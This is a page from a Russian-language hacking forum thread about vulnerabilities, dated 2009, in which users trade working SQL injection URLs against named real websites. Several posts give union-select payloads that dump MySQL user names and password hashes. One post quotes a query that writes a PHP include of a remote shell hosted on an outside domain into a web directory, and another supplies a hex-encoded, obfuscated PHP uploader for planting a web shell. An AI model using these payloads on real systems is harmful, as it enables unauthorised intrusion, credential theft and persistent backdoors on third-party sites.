ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 696 из 1393 « Первая < 196596646686 692 693 694 695 696 697 698 699 700 7067467961196 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6951  
Старый 04.05.2009, 03:45
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242+and+ascii(substring((se lect+concat_ws(0x2F,table_name,table_schema,column _name)+from+information_schema.columns+where+colum n_name+like+0x257061737325+limit+0,1),1,1))>1--+
 
Ответить с цитированием

  #6952  
Старый 04.05.2009, 04:43
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Там рядом с выводом скуля:
http://www.witchvox.com/va/dt_va.html?a=usfl&c=notes&id=10154)+union+select+1 ,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,use r,password,host,file_priv),16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56, 57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73 ,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,9 0,91,92,93,94,95,96,97,98,99,100,101,102,103,104,1 05,106,107,108,109,110,111,112+from+mysql.user--+

--------------------------------------------------


К топу ниже:

http://www.placementindia.com/job-search/view_res.php?code=546588&res_ty=ml'+union+select+1 ,concat_ws(0x3a,'%3Ch1%3E',user(),version(),databa se(),'%3C/h1%3E')+--+
Последний раз редактировалось AkyHa_MaTaTa; 04.05.2009 в 05:32..
 
Ответить с цитированием

  #6953  
Старый 04.05.2009, 04:59
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
Кто рассковыряет, тому будет всякое счастье Я не смог.
 
Ответить с цитированием

  #6954  
Старый 04.05.2009, 07:23
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию
Цитата:
Сообщение от mailbrush  
Код:
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Не у себя попробывал файл check.php создался в нём текст <? include("http://127.0.0.1/shell.txt") ?>
захожу на сайт шелл выплёвывает это
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Program Files\VertrigoServ\www\check.php on line 1

Warning: include(http://127.0.0.1/shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\Program Files\VertrigoServ\www\check.php on line 1

Warning: include() [function.include]: Failed opening 'http://127.0.0.1/shell.txt' for inclusion (include_path='.;C:\Program Files\VertrigoServ\Smarty') in C:\Program Files\VertrigoServ\www\check.php on line 1
 
Ответить с цитированием

  #6955  
Старый 04.05.2009, 08:43
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
загрузи какой нибудь мини аплоудер, например(пробелы поуберай):

PHP код:
select 
0x3c3f706870206576616c28677a696e666c617465286261736536345f6465636f646528276a5a505062707441454d62766c76774f6f35556c45696b4f6971746547724261705553706c4e535737665a6957516a44576944787237445974616f2b583376724a512b416b6c433769634532394e4244716e515854427858506654437a734c332f575a326471693543744642684a72636c5472767055366665393036655863687665334a6e5661727877324f7135556130386a456b5833564d3179796f32366674576c38666c6f4941396430416731375643494977706e556b616f565153655732575172566a5332586b69395636415434746278683841596979654f5462424e36723270693045744e6949692b4350686d6655595646337866457a665451786263795a2b2f616a782f41677846444749695a76774a6278655a62506245483647502b36534b3468445745657271326746416c3949714a597638773864625a72583032674b77795a634a71744643446433447a41724d504d53492f44444a7255316d486a6b6542596f4b6a45635730522f4e51534268596e7561434a79485a2f75734b3053656859525759464a44466678434d2f73645530684369763757356265773232654a647657477445736875304742416f7a617741435737466f624f4f4a7a4849694743746d674e6b4e7343327433364f38723475484842622b50347846577867713775335131563230596536345234614a537a654c632f652f68483477744179794159766f6d584c74546d667a394434645073727a5675524265512f385a6b4459754a5244704767736a77677661334b3731653331756249443341414f41664749506e652b735a4c79475452477347633559797758474b7a4a6a4c5248786164767a7156756e79735077413336484c48636a664d416e75546433363957506c5572574e5564514a6530733543746c3947764f436c47354873557877655178484354724e4e7347635777544f42336d697779574762702f41557237676b4e614657664b6333304d5779356a2f384b2b77702f41413d3d272929293b203f3e
INTO DUMPFILE 
'C:/Program Files/VertrigoServ/www/engine/inc/uplouder.php' 
ну а уже с помошью него загрузи шелл.
 
Ответить с цитированием

  #6956  
Старый 04.05.2009, 10:59
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию
Цитата:
Сообщение от molotovkeyt  
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1
Кто рассковыряет, тому будет всякое счастье Я не смог.
Там и не раскрутишь, тк инъекция в limit'е. Ищи другие инъекции, к примеру вот:
http://www.placementindia.com/job-recruiters/vac_hdetl.php?slno=238629'+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29+--+
Вывод присутствует.
 
Ответить с цитированием

  #6957  
Старый 04.05.2009, 21:02
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию
Кто сможет подсказать.
При помощи information_schema.schemata узнал имена используемых баз, а как узнать имена таблиц в конкретной базе?
Ведь как я понимаю по information_schema.tables выводятся имена таблиц во всех базах, а не в какой-то конкретной? Так ли, или я чего-то путаю?
 
Ответить с цитированием

  #6958  
Старый 04.05.2009, 21:12
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
select table_name from information_schema.tables where table_schema='blabla';
 
Ответить с цитированием

  #6959  
Старый 04.05.2009, 23:40
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию
приятного времени суток....

Возник вопрос.
Смотрел статью : https://forum.antichat.ru/showpost.php?p=1047515&postcount=79
и не хрена не понял ))))

сайт : http://www.intes-online.de/cms/index.php?id=1


Order/group by 1


подскажите , это уже не в 1 раз

Ps: спс за время
 
Ответить с цитированием

  #6960  
Старый 04.05.2009, 23:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Код:
http://www.intes-online.de/cms/index.php?id=1+and+substring(version(),1,1)=5
 
Ответить с цитированием
Ответ
Страница 696 из 1393 « Первая < 196596646686 692 693 694 695 696 697 698 699 700 7067467961196 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ